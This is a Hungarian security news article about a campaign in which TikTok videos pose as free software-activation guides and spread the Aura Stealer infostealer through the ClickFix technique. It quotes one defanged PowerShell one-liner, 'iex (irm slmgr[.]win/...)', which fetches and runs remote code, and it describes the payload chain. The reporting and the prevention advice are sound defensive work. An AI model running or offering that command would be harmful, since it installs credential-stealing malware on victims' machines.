Az utóbbi időben egyre gyakoribbá vált, hogy a cyberbűnözők TikTok videókat használnak fel arra, hogy kártékony szoftvereket juttassanak el a felhasználók számítógépeire. Ezek a videók úgy álcázzák magukat, mint ingyenes aktiválási útmutatók népszerű szoftverekhez, például Windows, Spotify vagy Netflix szolgáltatásokhoz, azonban valójában információlopó malware-t terjesztenek.
A kampány felfedezése és jellemzői
A kampányt Xavier Mertens, az ISC Handler szakértője fedezte fel, aki szerint az akció nagyban hasonlít a Trend Micro által 2023 májusában megfigyelt támadássorozathoz. A BleepingComputer által bemutatott videók úgy tesznek, mintha hivatalos aktiválási útmutatókat adnának olyan termékekhez, mint a Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro vagy Discord Nitro. Emellett hamisított szolgáltatásokat is reklámoznak, például Netflix és Spotify Premium verziókat.
A támadás módszere: ClickFix technika
Ezek a TikTok videók egy ClickFix nevű szociális mérnöki technikát alkalmaznak. Ez a módszer úgy jelenít meg „javításokat” vagy utasításokat, hogy azok legitimnek tűnjenek, miközben valójában arra csábítják a felhasználót, hogy káros PowerShell parancsokat vagy más szkripteket futtasson le számítógépén.
Minden videóban megjelenik egy rövid, egysoros parancs, amelyet a nézőknek rendszergazdai jogosultságokkal kell futtatniuk PowerShell-ben. Például:
iex (irm slmgr[.]win/photoshop)A parancsban szereplő programnév (például „photoshop”) változik attól függően, hogy melyik szoftvert próbálják hamisan aktiválni. Hamis Windows aktiváló videóknál például „windows” szerepel a URL-ben.
A malware működése és veszélyei
Amikor a felhasználó végrehajtja ezt a parancsot, a PowerShell kapcsolódik a távoli slmgr[.]win oldalhoz, ahonnan letölt és futtat egy másik PowerShell szkriptet. Ez a szkript két futtatható fájlt tölt le Cloudflare oldalakról:
- updater.exe – Ez az Aura Stealer nevű információlopó malware egy változata.
- source.exe – Egy további payload, amely .NET Visual C# Compiler segítségével önmagát fordítja le és memóriában futtatja a kódot.
Aura Stealer képes ellopni böngészőben tárolt jelszavakat, hitelesítő cookie-kat, kriptotárca adatokat és más alkalmazásokban tárolt bejelentkezési adatokat is. Ezeket az adatokat feltölti a támadóknak, akik így hozzáférhetnek az áldozatok fiókjaihoz.
A második payload célja még nem teljesen ismert, de valószínűleg további károkozásra vagy rejtett tevékenységre használják.
Megelőzés és teendők fertőzés esetén
Ha valaki végrehajtotta ezeket a lépéseket és gyanítja a fertőzést, akkor feltételezheti, hogy minden jelszava kompromittálódott. Azonnal meg kell változtatnia minden online fiókja jelszavát!
Fontos tanácsok:
- Soha ne másoljon és ne futtasson parancsokat ismeretlen vagy megbízhatatlan forrásból.
- Tartsa naprakészen operációs rendszerét és vírusvédelmi szoftvereit.
- Különösen legyen óvatos olyan utasításokkal kapcsolatban, amelyek PowerShell vagy parancssori futtatást kérnek.
- Használjon erős és egyedi jelszavakat minden szolgáltatáshoz.
- Kétfaktoros hitelesítést (2FA) alkalmazzon ahol csak lehet.
A ClickFix támadások növekvő népszerűsége
A ClickFix típusú támadások az elmúlt évben jelentősen elterjedtek. Ezeket különféle rosszindulatú programok terjesztésére használják ransomware kampányokban vagy kriptovaluta lopási akciók során. A módszer hatékonysága abban rejlik, hogy megtévesztő módon kínál „gyors megoldásokat”, így sok felhasználó könnyen bedőlhet neki.
Záró gondolatok
A digitális biztonság megőrzése érdekében mindig legyen körültekintő az interneten talált utasításokkal kapcsolatban. A TikTok és más közösségi platformok nemcsak szórakoztatásra szolgálnak – sajnos egyre gyakrabban válnak kiberbűnözők eszközévé is. Ha gyanús tartalmat látunk vagy kétségeink vannak egy adott videóval kapcsolatban, inkább keressünk megbízható forrásokat vagy kérjünk szakértői segítséget.
Ezzel a tudással felvértezve nagyobb eséllyel kerülhetjük el az ilyen típusú kibertámadásokat és védhetjük meg személyes adatainkat.